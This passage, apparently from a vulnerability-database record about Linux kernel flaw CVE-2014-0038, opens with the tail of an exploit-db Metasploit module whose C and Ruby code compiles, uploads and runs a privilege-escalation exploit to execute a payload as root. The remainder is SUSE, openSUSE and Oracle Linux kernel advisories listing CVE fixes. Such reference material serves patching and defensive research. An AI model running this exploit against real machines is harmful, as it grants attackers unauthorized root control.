msgs[0].msg_hdr.msg_iovlen = 1;\r\n\r\n for(i=0;i < 3 ;i++) {\r\n udp(i);\r\n retval = syscall(__NR_recvmmsg, sockfd, msgs, VLEN, 0, (void *)off->dest+7-i);\r\n if(!retval) {\r\n fprintf(stderr,\"\\nrecvmmsg() failed\\n\");\r\n }\r\n }\r\n\r\n close(sockfd);\r\n fprintf(stderr,\"\\n\");\r\n trigger();\r\n }\r\n }\r\n\r\n filename = rand_text_alphanumeric(8)\r\n executable_path = \"#{datastore['WritableDir']}/#{filename}\"\r\n payloadname = rand_text_alphanumeric(8)\r\n payload_path = \"#{datastore['WritableDir']}/#{payloadname}\"\r\n\r\n def has_prereqs?()\r\n gcc = cmd_exec('which gcc')\r\n if gcc.include?('gcc')\r\n vprint_good('gcc is installed')\r\n else\r\n print_error('gcc is not installed. Compiling will fail.')\r\n end\r\n return gcc.include?('gcc')\r\n end\r\n\r\n compile = false\r\n if datastore['COMPILE'] == 'Auto' || datastore['COMPILE'] == 'True'\r\n if has_prereqs?()\r\n compile = true\r\n vprint_status('Live compiling exploit on system')\r\n else\r\n vprint_status('Dropping pre-compiled exploit on system')\r\n end\r\n end\r\n if check != CheckCode::Appears\r\n fail_with(Failure::NotVulnerable, 'Target not vulnerable! punt!')\r\n end\r\n\r\n def upload_and_chmod(fname,fcontent)\r\n print_status \"Writing to #{fname} (#{fcontent.size} bytes)\"\r\n rm_f fname\r\n write_file(fname, fcontent)\r\n cmd_exec(\"chmod +x #{fname}\")\r\n register_file_for_cleanup(fname)\r\n end\r\n\r\n if compile\r\n recvmmsg.gsub!(/system\\(\"\\/bin\\/sh -i\"\\);/,\r\n \"system(\\\"#{payload_path}\\\");\")\r\n upload_and_chmod(\"#{executable_path}.c\", recvmmsg)\r\n vprint_status(\"Compiling #{executable_path}.c\")\r\n cmd_exec(\"gcc -o #{executable_path} #{executable_path}.c\") #compile\r\n register_file_for_cleanup(executable_path)\r\n else\r\n path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2014-0038', 'recvmmsg')\r\n fd = ::File.open( path, \"rb\")\r\n recvmmsg = fd.read(fd.stat.size)\r\n fd.close\r\n upload_and_chmod(executable_path, recvmmsg)\r\n # overwrite with the hardcoded variable names in the compiled versions\r\n payload_filename = 'a0RwAacU'\r\n payload_path = \"/tmp/#{payload_filename}\"\r\n end\r\n\r\n upload_and_chmod(payload_path, generate_payload_exe)\r\n stime = Time.now\r\n vprint_status(\"Exploiting... May take 13min. Start time: #{stime}\")\r\n output = cmd_exec(executable_path)\r\n output.each_line { |line| vprint_status(line.chomp) }\r\n end\r\nend", "sourceHref": "https://www.exploit-db.com/download/40503", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:41:55", "description": "The Linux Kernel was updated to version 3.11.10, fixing\n security issues and bugs:\n\n - floppy: bail out in open() if drive is not responding to\n block0 read (bnc#773058).\n\n - compat_sys_recvmmsg X32 fix (bnc#860993 CVE-2014-0038).\n\n - HID: usbhid: fix sis quirk (bnc#859804).\n\n - hwmon: (coretemp) Fix truncated name of alarm attributes\n\n - HID: usbhid: quirk for Synaptics Quad HD touchscreen\n (bnc#859804).\n - HID: usbhid: quirk for Synaptics HD touchscreen\n (bnc#859804).\n - HID: usbhid: merge the sis quirk (bnc#859804).\n - HID: hid-multitouch: add support for SiS panels\n (bnc#859804).\n - HID: usbhid: quirk for SiS Touchscreen (bnc#859804).\n - HID: usbhid: quirk for Synaptics Large Touchccreen\n (bnc#859804).\n\n - drivers: net: cpsw: fix dt probe for one port ethernet.\n - drivers: net: cpsw: fix for cpsw crash when build as\n modules.\n - dma: edma: Remove limits on number of slots.\n - dma: edma: Leave linked to Null slot instead of DUMMY\n slot.\n - dma: edma: Find missed events and issue them.\n - dma: edma: Write out and handle MAX_NR_SG at a given time.\n - dma: edma: Setup parameters to DMA MAX_NR_SG at a time.\n - ARM: edma: Add function to manually trigger an EDMA\n channel.\n - ARM: edma: Fix clearing of unused list for DT DMA\n resources.\n\n - ACPI: Add Toshiba NB100 to Vista _OSI blacklist.\n - ACPI: add missing win8 OSI comment to blacklist\n (bnc#856294).\n - ACPI: update win8 OSI blacklist.\n - ACPI: blacklist win8 OSI for buggy laptops.\n - ACPI: blacklist win8 OSI for ASUS Zenbook Prime UX31A\n (bnc#856294).\n\n - ACPI: Blacklist Win8 OSI for some HP laptop 2013 models\n (bnc#856294).\n\n - floppy: bail out in open() if drive is not responding to\n block0 read (bnc#773058).\n\n - ping: prevent NULL pointer dereference on write to\n msg_name (bnc#854175 CVE-2013-6432).\n\n - x86/dumpstack: Fix printk_address for direct addresses\n (bnc#845621).\n - Refresh patches.suse/stack-unwind.\n - Refresh patches.xen/xen-x86_64-dump-user-pgt.\n\n - KVM: x86: Convert vapic synchronization to _cached\n functions (CVE-2013-6368) (bnc#853052 CVE-2013-6368).\n\n - KVM: x86: fix guest-initiated crash with x2apic\n (CVE-2013-6376) (bnc#853053 CVE-2013-6376).\n\n - Build the KOTD against openSUSE:13.1:Update\n\n - xencons: generalize use of add_preferred_console()\n (bnc#733022, bnc#852652).\n - Update Xen patches to 3.11.10.\n - Rename patches.xen/xen-pcpu-hotplug to\n patches.xen/xen-pcpu.\n\n - KVM: x86: Fix potential divide by 0 in lapic\n (CVE-2013-6367) (bnc#853051 CVE-2013-6367).\n\n - KVM: Improve create VCPU parameter (CVE-2013-4587)\n (bnc#853050 CVE-2013-4587).\n\n - ipv6: fix headroom calculation in udp6_ufo_fragment\n (bnc#848042 CVE-2013-4563).\n\n - net: rework recvmsg handler msg_name and msg_namelen\n logic (bnc#854722).\n\n - patches.drivers/gpio-ucb1400-add-module_alias.patch:\n Update upstream reference\n -\n patches.drivers/gpio-ucb1400-can-be-built-as-a-module.patch:\n Update upstream reference\n\n - Delete patches.suse/ida-remove-warning-dump-stack.patch.\n Already included in kernel 3.11 (WARN calls dump_stack.)\n\n - xhci: Limit the spurious wakeup fix only to HP machines\n (bnc#852931).\n\n - iscsi_target: race condition on shutdown (bnc#850072).\n\n - Linux 3.11.10.\n - Refresh patches.xen/xen3-patch-2.6.29.\n - Delete\n patches.suse/btrfs-relocate-csums-properly-with-prealloc-ext\n ents.patch.\n\n -\n patches.drivers/xhci-Fix-spurious-wakeups-after-S5-on-Haswel\n l.patch: (bnc#852931).\n\n - Build mei and mei_me as modules (bnc#852656)\n\n - Linux 3.11.9.\n\n - Linux 3.11.8 (CVE-2013-4511 bnc#846529 bnc#849021).\n - Delete\n patches.drivers/ALSA-hda-Add-a-fixup-for-ASUS-N76VZ.\n - Delete\n patches.fixes/Fix-a-few-incorrectly-checked-io_-remap_pfn_ra\n nge-ca.patch.\n\n - Add USB PHY support (needed to get USB and Ethernet\n working on beagle and panda boards) Add\n CONFIG_PINCTRL_SINGLE=y to be able to use Device tree (at\n least for beagle and panda boards) Add ARM SoC sound\n support Add SPI bus support Add user-space access to I2C\n and SPI\n\n -\n patches.arch/iommu-vt-d-remove-stack-trace-from-broken-irq-r\n emapping-warning.patch: Fix forward porting, sorry.\n\n - iommu: Remove stack trace from broken irq remapping\n warning (bnc#844513).\n\n - gpio: ucb1400: Add MODULE_ALIAS.\n\n - Allow NFSv4 username mapping to work properly\n (bnc#838024).\n\n - nfs: check if gssd is running before attempting to use\n krb5i auth in SETCLIENTID call.\n - sunrpc: replace sunrpc_net-&gt;gssd_running flag with a more\n reliable check.\n - sunrpc: create a new dummy pipe for gssd to hold open.\n\n - Set CONFIG_GPIO_TWL4030 as built-in (instead of module)\n as a requirement to boot on SD card on beagleboard xM\n\n - armv6hl, armv7hl: Update config files. Set\n CONFIG_BATMAN_ADV_BLA=y as all other kernel configuration\n files have.\n\n - Update config files:\n * CONFIG_BATMAN_ADV_NC=y, because other BATMAN_ADV\n options are all enabled so why not this one.\n * CONFIG_GPIO_SCH=m, CONFIG_GPIO_PCH=m, because we\n support all other features of these pieces of hardware.\n * CONFIG_INTEL_POWERCLAMP=m, because this small driver\n might be useful in specific cases, and there's no\n obvious reason not to include it.\n\n - Fix a few incorrectly checked [io_]remap_pfn_range()\n calls (bnc#849021, CVE-2013-4511).\n - Linux 3.11.7.\n\n", "cvss3": {}, "published": "2014-02-06T19:21:55", "type": "suse", "title": "kernel to 3.11.10 (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-0038", "CVE-2013-6432", "CVE-2013-4511", "CVE-2013-6368", "CVE-2013-4563", "CVE-2013-6367", "CVE-2013-6376", "CVE-2013-4587"], "modified": "2014-02-06T19:21:55", "id": "OPENSUSE-SU-2014:0205-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-02/msg00003.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-08T21:45:39", "description": "The SUSE Linux Enterprise 12 kernel was updated to 3.12.61 to receive\n various security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (use-after-free) via a crafted\n SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages (bnc#1069702 1069708).\n - CVE-2017-1000405: The Linux Kernel had a problematic use of\n pmd_mkdirty() in the touch_pmd() function inside the THP implementation.\n touch_pmd() could be reached by get_user_pages(). In such case, the pmd\n would become dirty. This scenario breaks the new\n can_follow_write_pmd()'s logic - pmd could become dirty without going\n through a COW cycle. This bug was not as severe as the original &quot;Dirty\n cow&quot; because an ext4 file (or any other regular file) could not be\n mapped using THP. Nevertheless, it did allow us to overwrite read-only\n huge pages. For example, the zero huge page and sealed shmem files could\n be overwritten (since their mapping could be populated using THP). Note\n that after the first write page-fault to the zero page, it will be\n replaced with a new fresh (and zeroed) thp (bnc#1069496 1070307).\n - CVE-2017-16649: The usbnet_generic_cdc_bind function in\n drivers/net/usb/cdc_ether.c in the Linux kernel allowed local users to\n cause a denial of service (divide-by-zero error and system crash) or\n possibly have unspecified other impact via a crafted USB device\n (bnc#1067085).\n - CVE-2014-0038: The compat_sys_recvmmsg function in net/compat.c in the\n Linux kernel, when CONFIG_X86_X32 is enabled, allowed local users to\n gain privileges via a recvmmsg system call with a crafted timeout\n pointer parameter (bnc#860993).\n - CVE-2017-16650: The qmi_wwan_bind function in drivers/net/usb/qmi_wwan.c\n in the Linux kernel allowed local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly have unspecified\n other impact via a crafted USB device (bnc#1067086).\n - CVE-2017-16535: The usb_get_bos_descriptor function in\n drivers/usb/core/config.c in the Linux kernel allowed local users to\n cause a denial of service (out-of-bounds read and system crash) or\n possibly have unspecified other impact via a crafted USB device\n (bnc#1066700).\n - CVE-2017-15102: The tower_probe function in\n drivers/usb/misc/legousbtower.c in the Linux kernel allowed local users\n (who are physically proximate for inserting a crafted USB device) to\n gain privileges by leveraging a write-what-where condition that occurs\n after a race condition and a NULL pointer dereference (bnc#1066705).\n - CVE-2017-16531: drivers/usb/core/config.c in the Linux kernel allowed\n local users to cause a denial of service (out-of-bounds read and system\n crash) or possibly have unspecified other impact via a crafted USB\n device, related to the USB_DT_INTERFACE_ASSOCIATION descriptor\n (bnc#1066671).\n - CVE-2017-12193: The assoc_array_insert_into_terminal_node function in\n lib/assoc_array.c in the Linux kernel mishandled node splitting, which\n allowed local users to cause a denial of service (NULL pointer\n dereference and panic) via a crafted application, as demonstrated by the\n keyring key type, and key addition and link creation operations\n (bnc#1066192).\n - CVE-2017-16529: The snd_usb_create_streams function in sound/usb/card.c\n in the Linux kernel allowed local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have unspecified other\n impact via a crafted USB device (bnc#1066650).\n - CVE-2017-16525: The usb_serial_console_disconnect function in\n drivers/usb/serial/console.c in the Linux kernel allowed local users to\n cause a denial of service (use-after-free and system crash) or possibly\n have unspecified other impact via a crafted USB device, related to\n disconnection and failed setup (bnc#1066618).\n - CVE-2017-16537: The imon_probe function in drivers/media/rc/imon.c in\n the Linux kernel allowed local users to cause a denial of service (NULL\n pointer dereference and system crash) or possibly have unspecified other\n impact via a crafted USB device (bnc#1066573).\n - CVE-2017-16536: The cx231xx_usb_probe function in\n drivers/media/usb/cx231xx/cx231xx-cards.c in the Linux kernel allowed\n local users to cause a denial of service (NULL pointer dereference and\n system crash) or possibly have unspecified other impact via a crafted\n USB device (bnc#1066606).\n - CVE-2017-16527: sound/usb/mixer.c in the Linux kernel allowed local\n users to cause a denial of service (snd_usb_mixer_interrupt\n use-after-free and system crash) or possibly have unspecified other\n impact via a crafted USB device (bnc#1066625).\n\n The following non-security bugs were fixed:\n\n - Define sock_efree (bsc#1067997).\n - bcache: Add bch_keylist_init_single() (bsc#1047626).\n - bcache: Add btree_map() functions (bsc#1047626).\n - bcache: Add on error panic/unregister setting (bsc#1047626).\n - bcache: Convert gc to a kthread (bsc#1047626).\n - bcache: Delete some slower inline asm (bsc#1047626).\n - bcache: Drop unneeded blk_sync_queue() calls (bsc#1047626).\n - bcache: Fix a bug recovering from unclean shutdown (bsc#1047626).\n - bcache: Fix a journalling reclaim after recovery bug (bsc#1047626).\n - bcache: Fix a null ptr deref in journal replay (bsc#1047626).\n - bcache: Fix an infinite loop in journal replay (bsc#1047626).\n - bcache: Fix bch_ptr_bad() (bsc#1047626).\n - bcache: Fix discard granularity (bsc#1047626).\n - bcache: Fix for can_attach_cache() (bsc#1047626).\n - bcache: Fix heap_peek() macro (bsc#1047626).\n - bcache: Fix moving_pred() (bsc#1047626).\n - bcache: Fix to remove the rcu_sched stalls (bsc#1047626).\n - bcache: Improve bucket_prio() calculation (bsc#1047626).\n - bcache: Improve priority_stats (bsc#1047626).\n - bcache: Minor btree cache fix (bsc#1047626).\n - bcache: Move keylist out of btree_op (bsc#1047626).\n - bcache: New writeback PD controller (bsc#1047626).\n - bcache: PRECEDING_KEY() (bsc#1047626).\n - bcache: Performance fix for when journal entry is full (bsc#1047626).\n - bcache: Remove redundant block_size assignment (bsc#1047626).\n - bcache: Remove redundant parameter for cache_alloc() (bsc#1047626).\n - bcache: Remove/fix some header dependencies (bsc#1047626).\n - bcache: Trivial error handling fix (bsc#1047626).\n - bcache: Use ida for bcache block dev minor (bsc#1047626).\n - bcache: allows use of register in udev to avoid &quot;device_busy&quot; error\n (bsc#1047626).\n - bcache: bch_allocator_thread() is not freezable (bsc#1047626).\n - bcache: bch_gc_thread() is not freezable (bsc#1047626).\n - bcache: bugfix - gc thread now gets woken when cache is full\n (bsc#1047626).\n - bcache: bugfix - moving_gc now moves only correct buckets (bsc#1047626).\n - bcache: cleaned up error handling around register_cache() (bsc#1047626).\n - bcache: clear BCACHE_DEV_UNLINK_DONE flag when attaching a backing\n device (bsc#1047626).\n - bcache: defensively handle format strings (bsc#1047626).\n - bcache: fix BUG_ON due to integer overflow with GC_SECTORS_USED\n (bsc#1047626).\n - bcache: fix a livelock when we cause a huge number of cache misses\n (bsc#1047626).\n - bcache: fix crash in bcache_btree_node_alloc_fail tracepoint\n (bsc#1047626).\n - bcache: fix for gc and writeback race (bsc#1047626).\n - bcache: fix for gc crashing when no sectors are used (bsc#1047626).\n - bcache: kill index() (bsc#1047626).\n - bcache: only recovery I/O error for writethrough mode (bsc#1043652).\n - bcache: register_bcache(): call blkdev_put() when cache_alloc() fails\n (bsc#1047626).\n - bcache: stop moving_gc marking buckets that can't be moved (bsc#1047626).\n - mac80211: do not compare TKIP TX MIC key in reinstall prevention\n (bsc#1066472).\n - mac80211: use constant time comparison with keys (bsc#1066471).\n - powerpc/powernv: Remove OPAL v1 takeover (bsc#1070781).\n - powerpc/vdso64: Use double word compare on pointers\n - powerpc: Convert cmp to cmpd in idle enter sequence\n\n", "cvss3": {}, "published": "2017-12-08T18:11:43", "type": "suse", "title": "Security update for the Linux Kernel (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2017-16525", "CVE-2014-0038", "CVE-2017-12193", "CVE-2017-16649", "CVE-2017-16535", "CVE-2017-16537", "CVE-2017-16527", "CVE-2017-16536", "CVE-2017-15102", "CVE-2017-16939", "CVE-2017-16529", "CVE-2017-16650", "CVE-2017-16531", "CVE-2017-1000405"], "modified": "2017-12-08T18:11:43", "id": "SUSE-SU-2017:3249-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00023.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T19:02:55", "description": "The SUSE Linux Enterprise 12 SP1 kernel was updated to receive various\n security and bugfixes.\n\n The following security bugs were fixed:\n\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c in the Linux kernel allowed local users to gain\n privileges or cause a denial of service (use-after-free) via a crafted\n SO_RCVBUF setsockopt system call in conjunction with XFRM_MSG_GETPOLICY\n Netlink messages. (bnc#1069702)\n - CVE-2017-1000405: mm, thp: do not dirty huge pages on read fault\n (bnc#1069496).\n - CVE-2017-16649: The usbnet_generic_cdc_bind function in\n drivers/net/usb/cdc_ether.c in the Linux kernel allowed local users to\n cause a denial of service (divide-by-zero error and system crash) or\n possibly have unspecified other impact via a crafted USB device.\n (bnc#1067085)\n - CVE-2014-0038: The compat_sys_recvmmsg function in net/compat.c, when\n CONFIG_X86_X32 is enabled, allowed local users to gain privileges via a\n recvmmsg system call with a crafted timeout pointer parameter\n (bnc#860993).\n - CVE-2017-16650: The qmi_wwan_bind function in drivers/net/usb/qmi_wwan.c\n in the Linux kernel allowed local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly have unspecified\n other impact via a crafted USB device. (bnc#1067086)\n - CVE-2017-16535: The usb_get_bos_descriptor function in\n drivers/usb/core/config.c in the Linux kernel allowed local users to\n cause a denial of service (out-of-bounds read and system crash) or\n possibly have unspecified other impact via a crafted USB device.\n (bnc#1066700)\n - CVE-2017-15102: The tower_probe function in\n drivers/usb/misc/legousbtower.c in the Linux kernel allowed local users\n (who are physically proximate for inserting a crafted USB device) to\n gain privileges by leveraging a write-what-where condition that occurs\n after a race condition and a NULL pointer dereference. (bnc#1066705)\n - CVE-2017-16531: drivers/usb/core/config.c in the Linux kernel allowed\n local users to cause a denial of service (out-of-bounds read and system\n crash) or possibly have unspecified other impact via a crafted USB\n device, related to the USB_DT_INTERFACE_ASSOCIATION descriptor.\n (bnc#1066671)\n - CVE-2017-12193: The assoc_array_insert_into_terminal_node function in\n lib/assoc_array.c in the Linux kernel mishandled node splitting, which\n allowed local users to cause a denial of service (NULL pointer\n dereference and panic) via a crafted application, as demonstrated by the\n keyring key type, and key addition and link creation operations.\n (bnc#1066192)\n - CVE-2017-16529: The snd_usb_create_streams function in sound/usb/card.c\n in the Linux kernel allowed local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have unspecified other\n impact via a crafted USB device. (bnc#1066650)\n - CVE-2017-16525: The usb_serial_console_disconnect function in\n drivers/usb/serial/console.c in the Linux kernel allowed local users to\n cause a denial of service (use-after-free and system crash) or possibly\n have unspecified other impact via a crafted USB device, related to\n disconnection and failed setup. (bnc#1066618)\n - CVE-2017-16537: The imon_probe function in drivers/media/rc/imon.c in\n the Linux kernel allowed local users to cause a denial of service (NULL\n pointer dereference and system crash) or possibly have unspecified other\n impact via a crafted USB device. (bnc#1066573)\n - CVE-2017-16536: The cx231xx_usb_probe function in\n drivers/media/usb/cx231xx/cx231xx-cards.c in the Linux kernel allowed\n local users to cause a denial of service (NULL pointer dereference and\n system crash) or possibly have unspecified other impact via a crafted\n USB device. (bnc#1066606)\n - CVE-2017-16527: sound/usb/mixer.c in the Linux kernel allowed local\n users to cause a denial of service (snd_usb_mixer_interrupt\n use-after-free and system crash) or possibly have unspecified other\n impact via a crafted USB device. (bnc#1066625)\n\n The following non-security bugs were fixed:\n\n - NVMe: No lock while DMA mapping data (bsc#975788).\n - bcache: Add bch_keylist_init_single() (bsc#1047626).\n - bcache: Add btree_map() functions (bsc#1047626).\n - bcache: Add on error panic/unregister setting (bsc#1047626).\n - bcache: Convert gc to a kthread (bsc#1047626).\n - bcache: Delete some slower inline asm (bsc#1047626).\n - bcache: Drop unneeded blk_sync_queue() calls (bsc#1047626).\n - bcache: Fix a bug recovering from unclean shutdown (bsc#1047626).\n - bcache: Fix a journalling reclaim after recovery bug (bsc#1047626).\n - bcache: Fix a null ptr deref in journal replay (bsc#1047626).\n - bcache: Fix an infinite loop in journal replay (bsc#1047626).\n - bcache: Fix bch_ptr_bad() (bsc#1047626).\n - bcache: Fix discard granularity (bsc#1047626).\n - bcache: Fix for can_attach_cache() (bsc#1047626).\n - bcache: Fix heap_peek() macro (bsc#1047626).\n - bcache: Fix moving_pred() (bsc#1047626).\n - bcache: Fix to remove the rcu_sched stalls (bsc#1047626).\n - bcache: Improve bucket_prio() calculation (bsc#1047626).\n - bcache: Improve priority_stats (bsc#1047626).\n - bcache: Minor btree cache fix (bsc#1047626).\n - bcache: Move keylist out of btree_op (bsc#1047626).\n - bcache: New writeback PD controller (bsc#1047626).\n - bcache: PRECEDING_KEY() (bsc#1047626).\n - bcache: Performance fix for when journal entry is full (bsc#1047626).\n - bcache: Remove redundant block_size assignment (bsc#1047626).\n - bcache: Remove redundant parameter for cache_alloc() (bsc#1047626).\n - bcache: Remove/fix some header dependencies (bsc#1047626).\n - bcache: Trivial error handling fix (bsc#1047626).\n - bcache: Use ida for bcache block dev minor (bsc#1047626).\n - bcache: allows use of register in udev to avoid &quot;device_busy&quot; error\n (bsc#1047626).\n - bcache: bch_allocator_thread() is not freezable (bsc#1047626).\n - bcache: bch_gc_thread() is not freezable (bsc#1047626).\n - bcache: bugfix - gc thread now gets woken when cache is full\n (bsc#1047626).\n - bcache: bugfix - moving_gc now moves only correct buckets (bsc#1047626).\n - bcache: cleaned up error handling around register_cache() (bsc#1047626).\n - bcache: clear BCACHE_DEV_UNLINK_DONE flag when attaching a backing\n device (bsc#1047626).\n - bcache: defensively handle format strings (bsc#1047626).\n - bcache: fix BUG_ON due to integer overflow with GC_SECTORS_USED\n (bsc#1047626).\n - bcache: fix a livelock when we cause a huge number of cache misses\n (bsc#1047626).\n - bcache: fix crash in bcache_btree_node_alloc_fail tracepoint\n (bsc#1047626).\n - bcache: fix for gc and writeback race (bsc#1047626).\n - bcache: fix for gc crashing when no sectors are used (bsc#1047626).\n - bcache: kill index() (bsc#1047626).\n - bcache: register_bcache(): call blkdev_put() when cache_alloc() fails\n (bsc#1047626).\n - bcache: stop moving_gc marking buckets that can't be moved (bsc#1047626).\n - mac80211: do not compare TKIP TX MIC key in reinstall prevention\n (bsc#1066472).\n - mac80211: use constant time comparison with keys (bsc#1066471).\n - packet: fix use-after-free in fanout_add()\n - scsi: ILLEGAL REQUEST + ASC==27 produces target failure (bsc#1059465).\n\n", "cvss3": {}, "published": "2017-12-04T15:07:06", "type": "suse", "title": "Security update for the Linux Kernel (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2017-16525", "CVE-2014-0038", "CVE-2017-12193", "CVE-2017-16649", "CVE-2017-16535", "CVE-2017-16537", "CVE-2017-16527", "CVE-2017-16536", "CVE-2017-15102", "CVE-2017-16939", "CVE-2017-16529", "CVE-2017-16650", "CVE-2017-16531", "CVE-2017-1000405"], "modified": "2017-12-04T15:07:06", "id": "SUSE-SU-2017:3210-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00005.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:42:58", "description": "The Linux kernel was updated to fix various bugs and\n security issues:\n\n - mm/page-writeback.c: do not count anon pages as dirtyable\n memory (reclaim stalls).\n - mm/page-writeback.c: fix dirty_balance_reserve\n subtraction from dirtyable memory (reclaim stalls).\n\n - compat_sys_recvmmsg X32 fix (bnc#860993 CVE-2014-0038).\n\n - hwmon: (coretemp) Fix truncated name of alarm attributes\n\n - net: fib: fib6_add: fix potential NULL pointer\n dereference (bnc#854173 CVE-2013-6431).\n\n - keys: fix race with concurrent install_user_keyrings()\n (bnc#808358)(CVE-2013-1792).\n\n - KVM: x86: Convert vapic synchronization to _cached\n functions (CVE-2013-6368) (bnc#853052 CVE-2013-6368).\n\n - wireless: radiotap: fix parsing buffer overrun\n (bnc#854634 CVE-2013-7027).\n\n - KVM: x86: fix guest-initiated crash with x2apic\n (CVE-2013-6376) (bnc#853053 CVE-2013-6376).\n\n - KVM: x86: Fix potential divide by 0 in lapic\n (CVE-2013-6367) (bnc#853051 CVE-2013-6367).\n\n - KVM: Improve create VCPU parameter (CVE-2013-4587)\n (bnc#853050 CVE-2013-4587).\n\n - staging: ozwpan: prevent overflow in oz_cdev_write()\n (bnc#849023 CVE-2013-4513).\n\n - perf/x86: Fix offcore_rsp valid mask for SNB/IVB\n (bnc#825006).\n - perf/x86: Add Intel IvyBridge event scheduling\n constraints (bnc#825006).\n\n - libertas: potential oops in debugfs (bnc#852559\n CVE-2013-6378).\n\n - aacraid: prevent invalid pointer dereference (bnc#852373\n CVE-2013-6380).\n\n - staging: wlags49_h2: buffer overflow setting station name\n (bnc#849029 CVE-2013-4514).\n\n - net: flow_dissector: fail on evil iph-&gt;ihl (bnc#848079\n CVE-2013-4348).\n\n - Staging: bcm: info leak in ioctl (bnc#849034\n CVE-2013-4515).\n\n - Refresh\n patches.fixes/net-rework-recvmsg-handler-msg_name-and-msg_na\n melen-logic.patch.\n\n - ipv6: remove max_addresses check from\n ipv6_create_tempaddr (bnc#805226, CVE-2013-0343).\n\n - net: rework recvmsg handler msg_name and msg_namelen\n logic (bnc#854722).\n\n - crypto: ansi_cprng - Fix off by one error in non-block\n size request (bnc#840226).\n\n - x6: Fix reserve_initrd so that acpi_initrd_override is\n reached (bnc#831836).\n - Refresh other Xen patches.\n\n - aacraid: missing capable() check in compat ioctl\n (bnc#852558).\n\n -\n patches.fixes/gpio-ich-fix-ichx_gpio_check_available-return.\n patch: Update upstream reference\n\n - perf/ftrace: Fix paranoid level for enabling function\n tracer (bnc#849362).\n\n - xhci: fix null pointer dereference on\n ring_doorbell_for_active_rings (bnc#848255).\n - xhci: Fix oops happening after address device timeout\n (bnc#848255).\n - xhci: Ensure a command structure points to the correct\n trb on the command ring (bnc#848255).\n\n -\n patches.arch/iommu-vt-d-remove-stack-trace-from-broken-irq-r\n emapping-warning.patch: Update upstream reference.\n\n - Allow NFSv4 username mapping to work properly\n (bnc#838024).\n\n - Refresh btrfs attribute publishing patchset to match\n openSUSE-13.1 No user-visible changes, but uses\n kobj_sysfs_ops and better kobject lifetime management.\n\n - Fix a few incorrectly checked [io_]remap_pfn_range()\n calls (bnc#849021, CVE-2013-4511).\n\n - drm/radeon: don't set hpd, afmt interrupts when\n interrupts are disabled.\n\n -\n patches.fixes/cifs-fill-TRANS2_QUERY_FILE_INFO-ByteCount-fie\n lds.patch: Fix TRANS2_QUERY_FILE_INFO ByteCount fields\n (bnc#804950).\n\n - iommu: Remove stack trace from broken irq remapping\n warning (bnc#844513).\n\n - Disable patches related to bnc#840656\n patches.suse/btrfs-cleanup-don-t-check-the-same-thing-twice\n patches.suse/btrfs-0220-fix-for-patch-cleanup-don-t-check-th\n e-same-thi.patch\n\n - btrfs: use feature attribute names to print better error\n messages.\n - btrfs: add ability to change features via sysfs.\n - btrfs: add publishing of unknown features in sysfs.\n - btrfs: publish per-super features to sysfs.\n - btrfs: add per-super attributes to sysfs.\n - btrfs: export supported featured to sysfs.\n - kobject: introduce kobj_completion.\n - btrfs: add ioctls to query/change feature bits online.\n - btrfs: use btrfs_commit_transaction when setting fslabel.\n\n - x86/iommu/vt-d: Expand interrupt remapping quirk to cover\n x58 chipset (bnc#844513).\n\n - NFSv4: Fix issues in nfs4_discover_server_trunking\n (bnc#811746).\n\n - iommu/vt-d: add quirk for broken interrupt remapping on\n 55XX chipsets (bnc#844513).\n\n", "cvss3": {}, "published": "2014-02-06T19:04:40", "type": "suse", "title": "kernel: security and bugfix update (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2013-7027", "CVE-2014-0038", "CVE-2013-4513", "CVE-2013-6378", "CVE-2013-4515", "CVE-2013-6431", "CVE-2013-4511", "CVE-2013-1792", "CVE-2013-6368", "CVE-2013-6367", "CVE-2013-4514", "CVE-2013-6376", "CVE-2013-6380", "CVE-2013-0343", "CVE-2013-4587", "CVE-2013-4348"], "modified": "2014-02-06T19:04:40", "id": "OPENSUSE-SU-2014:0204-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-02/msg00002.html", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:16", "description": "kernel-uek \r\n[3.8.13-35.el6uek] \r\n- n_tty: Fix n_tty_write crash when echoing in raw mode (Peter Hurley) [Orabug: 18754908] {CVE-2014-0196} {CVE-2014-0196} \r\n \n[3.8.13-34.el6uek] \r\n- aacraid: missing capable() check in compat ioctl (Dan Carpenter) [Orabug: 18721960] {CVE-2013-6383} \r\n- vhost: fix total length when packets are too short (Michael S. Tsirkin) [Orabug: 18721975] {CVE-2014-0077} \r\n \n[3.8.13-33.el6uek] \r\n- dtrace: ensure one can try to get user pages without locking or faulting (Kris Van Hees) [Orabug: 18653173] \r\n- ipv6: don't set DST_NOCOUNT for remotely added routes (Sabrina Dubroca) [Orabug: 18681501] {CVE-2014-2309} 